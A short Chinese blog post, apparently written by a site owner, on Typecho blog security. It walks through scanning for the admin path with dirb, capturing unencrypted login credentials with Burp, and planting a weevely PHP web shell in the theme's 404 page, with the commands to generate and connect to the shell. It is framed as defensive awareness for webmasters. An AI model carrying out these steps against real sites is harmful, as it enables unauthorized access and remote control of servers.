Typecho
是一款轻量级的博客程序,和著名的博客程序WP有很多相似之处。本文简单谈谈Typecho安全相关问题。
注意!文本所有测试均为模拟环境,旨在提出安全相关问题,帮助站长防患于未然。坚决反对一切危害网络安全的行为。
前不久,提到过Typecho相关XXS漏洞。现在均已修复,本文不再长谈。下面简单谈谈常见的思路吧!
可以利用常见的目录扫描工具,对站点的敏感目录进行扫描。
dirb https://blog.bbskali.cn
通过扫描,我们便得到了站点的后台。
Typecho目前后台登录,安全防范比较低,没有验证码,密码传输没有加密。
我自己的站,就不打码了😥
既然没有加密,直接可以用Burp直接恢复。
当用户登录后,接下来便是提权了。Typecho和WP一样,支持在线编辑主题文件。这里,我们以404
文件为例。
随便输入一个错误的URL
能够复现php探针就好玩了。我们用weevely
创建一个Shell
# bbskali为连接密码
weevely generate bbskali 4.php
查看生成的代码
cat 4.php
看到乱码,不要慌,复制代码到404文件👇
连接:
weevely http://blog.bbskali.cn/404.php bbskali